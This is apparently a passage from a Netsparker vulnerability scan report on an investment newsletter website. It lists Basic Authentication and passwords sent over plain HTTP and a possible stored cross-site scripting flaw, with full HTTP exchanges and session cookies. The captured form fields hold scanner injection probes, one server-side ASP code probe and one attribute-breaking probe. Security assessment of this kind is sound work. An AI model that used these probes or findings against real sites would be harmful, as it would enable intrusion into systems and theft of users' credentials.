<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left&..
Basic Authorisation over Clear Text

Basic Authorisation over Clear Text

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that the application is using Basic Authorisation over HTTP. Basic Authentication sends username and password in plain text.

Impact

If an attacker can intercept traffic on the network, he/she might be able to steal the users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your directories which require authentication to be served only over HTTPS and disable any access to these pages over HTTP.

Remedy

All sensitive data should be transferred only over HTTPS.

Classification

- /onlinevideo/

/onlinevideo/ CONFIRMED

Request

GET /onlinevideo/ HTTP/1.1
Referer: http://www.stansberryresearch.com/onlinevideo/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=BJPNLMLBKHLOJGNMKJFLPFDN; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=BPFBMFABLGOPBOKJDLGCHDDN; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 401 Unauthorized
Content-Length: 1539
Content-Type: text/html
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate,NTLM,Basic realm="www.stansberryresearch.com"
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Date: Fri, 04 Nov 2011 05:46:50 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>You are not authorized to view this page</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>You are not authorized to view this page</h1>
You do not have permission to view this directory or page using the credentials that you supplied.
<hr>
<p>Please try the following:</p>
<ul>
<li>Contact the Web site administrator if you believe you should be able to view this directory or page.</li>
<li>Click the <a href="javascript:location.reload()">Refresh</a> button to try again with different credentials.</li>
</ul>
<h2>HTTP Error 401.1 - Unauthorized: Access is denied due to invalid credentials.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>401</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Authentication</b>, <b>Access Control</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

- /privacy.asp

/privacy.asp CONFIRMED

Form target action

/ICA/default.aspx

Request

GET /privacy.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pro/1108PSINEWVD/6PSIMA21/PR
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=DBNNLMLBJJMJIFIBPGPKODAM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=FLEBMFABNCCHGOMGCEDHEHOG
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:36:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 21527
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>News and Events - Stansberry Investment Research</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="Read about the news and upcoming events from Stansberry and Associates Investment Research.">
<meta name="keywords" content="stansberry news, upcoming events, investment news, market research news, stansberry events, investment research">
<meta name="copyright" content=" �2008 Stansberry & Associates Investment Research ">
<meta name="ROBOTS" content="ALL">
<link rel="stylesheet" href="includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
<td width="189" align="left" valign="top" bgcolor="#FFFFFF">
<table width="183" border="0" align="left" cellpadding="1" cellspacing="0">
<tr align="left" valign="top">
<td colspan="2"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong><img src="/images/premium_sub_head.gif" alt="Premium Products" width="183" height="19"></strong></font></td>
</tr>
<tr align="left" valign="top">
<td width="2%">&nbsp;</td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/trw/index.asp">True Wealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/psi/index.asp">Stansberry's Investment Advisory</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/oil/index.asp">S&A Resource Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/btr/index.asp">Advanced Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/twp/index.asp">The 12% Letter</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/dil/index.asp">Phase 1 Investor</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/evi/index.asp">Extreme Value</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/shr/index.asp">S&A Short Report</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tin/index.asp">True Income</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rem/index.asp">Retirement Millionaire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/rtr/index.asp">Retirement Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pst/index.asp">Penny Stock Specialist</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/jrt/index.asp">Junior Resource Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/gra/index.asp">S&A Grail Trader</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/tws/index.asp">True Wealth Systems</a></font></td>
</tr>

<tr align="left" valign="top">
<td width="2%"></td>
<td width="98%"><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/digest/index.asp">The S&A Digest</a></font></td>
</tr>

<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="1"></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.dailywealth.com" target="new window">DailyWealth</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.growthstockwire.com" target="new window">Growth Stock Wire</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.thedailycrux.com" target="new window">The Daily Crux</a></font></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><img src="/images/white_fill.gif" width="1" height="10"></td>
</tr>
<tr align="left" valign="top">
<td colspan="2"><strong><img src="/images/lifetime_sub_head.gif" alt="Lifetime Memberships" width="183" height="19"></strong></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pal/index.asp">The S&A Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/pub/pwa/index.asp">Private Wealth Alliance</a></font></td>
</tr>
<tr align="left" valign="top">
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
</table>

</td>
<TD WIDTH="1" BGCOLOR="#cccccc"><IMG SRC="1-1.gif" WIDTH="1"
HEIGHT="1"></TD>
<td width="9" align="left" valign="top" bgcolor="#FFFFFF"><div align="left"> </div></td>
<td align="left" valign="top" bgcolor="#FFFFFF"><p><img src="/secure/images/privacy_title.gif" width="317" height="30"></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">We take your privacy very seriously. If you have any questions on our privacy policy that are not addressed below, contact customer service at 1-888-261-2693, Monday through Friday, 9 a.m.-5 p.m. EST. </font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>E-mail Address</strong></font></p>
<p><font size="2" face="Verdana, Arial, Helvetica, sans-serif">When you subscribe, your e-mail address is placed in a database and used to send your issues, special notices from the service or publication you subscribed to, and occasional advertisements. We will not add your name to our e-mail list without your permission. We will not sell, rent, or otherwise share your e-mail address with anyone. </font></p>
<p>..
[Possible] Permanent Cross-site Scripting

[Possible] Permanent Cross-site Scripting

1 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

- /forms/palConference.asp

/forms/palConference.asp

Injection URL

http://www.stansberryresearch.com/responses/pal_registration_thanks.asp

Injection Request

GET /responses/pal_registration_thanks.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PBAOLMLBLAOGFFOELCCOEMHM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CDGBMFABKFKGIKOPGAIGEPEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Identification Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=PBAOLMLBLAOGFFOELCCOEMHM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=CDGBMFABKFKGIKOPGAIGEPEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d000000000000c55c000000000000
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 3263
Content-Type: text/html
Cache-control: private


<html>
<head>
<title>S&amp;A Alliance</title>
</head>

<body bgcolor="#CCCCCC">
<table width="580" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td><div align="left"><img src="http://www.stansberryresearch.com/images/white_spacer.gif" width="55" height="15"></div></td>
</tr>
<tr>
<td><div align="center"><img src="http://www.stansberryresearch.com/secure/images/pal_header.gif"></div></td>
</tr>
<tr>
<td><table width="550" border="0" align="center" cellpadding="3" cellspacing="0">
<tr>
<td bgcolor="#999999"><div align="right"><font face="Verdana, Times New Roman, Times, serif" size="2" font color="#FFFFFF">Friday, November 04, 2011</font></div></td>
</tr>
</table></td>
</tr>
<tr>
<td> <table width="550" border="0" align="center" cellpadding="3" cellspacing="0">
<tr>
<td align="left" valign="top"><!-- Template Begin -->
<table width="550" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="left" valign="top">
<div align="left"><font face="Verdana, Times New Roman, Times, serif" size="2">
</font><center>
<font size="2" face="Verdana, Times New Roman, Times, serif"><b>2010 Alliance Meeting Confirmation</b></font>
</center><font face="Verdana, Times New Roman, Times, serif" size="2"><br>
<b>PLEASE PRINT THIS PAGE OFF FOR YOUR RECORDS</b>, as it contains important information:<br><br>
<b>Date</b>: Monday, November 15 <sup>th</sup>, 2010<br>
<br>
<b><u>Time</u></b>:<br>
8:00am - 9:00am - Breakfast<br>
9:00am - 5:00pm - Meeting<br>
12:00pm - 1:00pm - Lunch<br>
6:30pm - 7:00pm - Cocktail Reception<br>
7:00pm - 9:30pm - Dinner<br>
<br>
<b><u>Location/Hotel</u></b>:<br>
The Dolder Grand <br>
Kurhaus Strasse 65 <br>
8032 Zurich <br>
<a href="http://www.thedoldergrand.com">www.thedoldergrand.com</a><br>
<br>
You'll want to fly into Zurich (ZRH).<br>
<br>
<b>Kristen Anderson will be contacting you to obtain your credit card information to guarantee your hotel reservation. </b><br>
<br>
We look forward to seeing you!
<br><br>
If you have any questions or concerns, please contact Kristen Anderson: <a href="mailto:kanderson@stansberryresearch.com">kanderson@stansberryresearch.com</a></font></div>
<hr align="center" width="100%" size="1" noshade="noshade" />
<table width="100" border="0" align="right" cellpadding="0" cellspacing="0">
<tr>
<td><img src="http://www.stansberryresearch.com/images/sa_logo.gif" width="198" height="39" /></td>
</tr>
</table>
</div></td>
</tr>
</table>
<center>

<!-- Template End -->

</center>
</td>
</tr>
</table>
</td>
</tr>
</table></td>
</tr>
</table>
</body>
</html>

Identification Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:49:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20067
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value="3">3</option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="''" ns= netsparker(0x003E0B) ">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value=""></option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>